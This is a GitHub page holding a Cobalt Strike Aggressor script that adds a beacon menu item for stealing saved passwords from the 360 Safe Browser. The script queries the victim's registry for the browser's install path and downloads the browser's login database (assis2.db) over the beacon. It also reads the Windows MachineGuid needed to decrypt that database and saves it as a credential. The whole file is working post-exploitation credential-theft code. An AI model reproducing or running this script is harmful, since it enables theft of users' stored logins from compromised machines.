-
Notifications
You must be signed in to change notification settings - Fork 93
/
Copy path360SafeBrowsergetpass.cna
executable file
·48 lines (41 loc) · 1.28 KB
/
360SafeBrowsergetpass.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#author=haya
sub getMachineGuid{
$arch = barch($1);
if ($arch == 'x64'){
breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
}
else{
breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x86");
breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
}
}
sub SafeBrowsergetpass {
bshell($bid, 'reg query HKEY_CLASSES_ROOT\360seURL\shell\open\command|findstr exe');
}
popup beacon_bottom {
item "SafeBrowsergetpass"{
$bid = $1['@'];
SafeBrowsergetpass($bid);
getMachineGuid($bid);
}
}
on beacon_output {
$magicstring = "360se6\\Application\\360se.exe";
$magicstring2 = "MachineGuid";
if ($magicstring isin $2){
$length = strlen($2);
$last = lindexOf($2, ":");
$res = substr($2, $last - 1, $length - 32);
$dbPath = "User Data\\Default\\apps\\LoginAssis\\assis2.db";
$res = $res . $dbPath;
bdownload($1, $res);
blog($1,"360 SafeBrowser DB Downloading");
}
if ($magicstring2 isin $2){
$lasta = lindexOf($2, "\nMachineGuid");
$MachineGuid = substr($2, $lasta + 26, -1);
$beaconHost = beacon_info($1, "host");
credential_add($empty,$MachineGuid, $empty, $empty, $beaconHost);
blog($1,"MachineGuid Get Success");
}
}